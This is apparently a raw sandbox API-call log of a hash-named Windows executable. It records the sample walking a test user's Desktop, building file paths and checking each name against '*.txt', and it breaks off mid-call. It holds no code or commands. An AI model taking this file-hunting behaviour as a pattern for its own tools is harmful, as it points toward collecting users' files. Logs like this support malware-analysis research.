[0110.614] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.614] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.614] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.614] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743860 [0110.615] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.615] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.615] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.615] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.615] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.615] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.615] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.619] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.619] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.619] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.619] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.619] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.619] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.619] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.619] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.619] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.619] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.619] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.619] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.619] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.619] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.619] lstrcatW (in: lpString1="\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="\\0zAI6IIW3Y-.jpg") returned="\\0zAI6IIW3Y-.jpg" [0110.619] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.619] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x29a0550 [0110.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x29a0550, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.619] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.620] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.620] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*.txt") returned 0 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.620] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.620] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.620] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.620] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.620] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.620] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.620] lstrcatW (in: lpString1="\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="\\31NPwfpy_GlRh15.m4a") returned="\\31NPwfpy_GlRh15.m4a" [0110.620] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.620] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x29a0560 [0110.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x29a0560, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.620] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.620] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.620] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.621] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*.txt") returned 0 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.621] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.621] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.621] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.621] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.621] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.621] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.621] lstrcatW (in: lpString1="\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="\\38ZOxe4ZNObW5Sq.pdf") returned="\\38ZOxe4ZNObW5Sq.pdf" [0110.621] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.621] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x29a0560 [0110.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x29a0560, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.621] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.621] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.621] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*.txt") returned 0 [0110.621] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.621] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.621] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.621] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.621] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.622] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.622] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.622] lstrcatW (in: lpString1="\\", lpString2="7eG9d7.mp4" | out: lpString1="\\7eG9d7.mp4") returned="\\7eG9d7.mp4" [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x29a0550 [0110.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x29a0550, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.622] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.622] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.622] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.622] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*.txt") returned 0 [0110.622] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.622] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.622] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.622] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.622] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.622] lstrcatW (in: lpString1="\\", lpString2="desktop.ini" | out: lpString1="\\desktop.ini") returned="\\desktop.ini" [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.622] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x29a0550 [0110.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x29a0550, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.623] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.txt") returned 0 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.623] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.623] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.623] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.623] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.623] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.623] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.623] lstrcatW (in: lpString1="\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd0) returned 0x29a11c0 [0110.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a04e8 [0110.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a04e8, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a6690 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.623] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.623] MultiByteToWideChar (in: 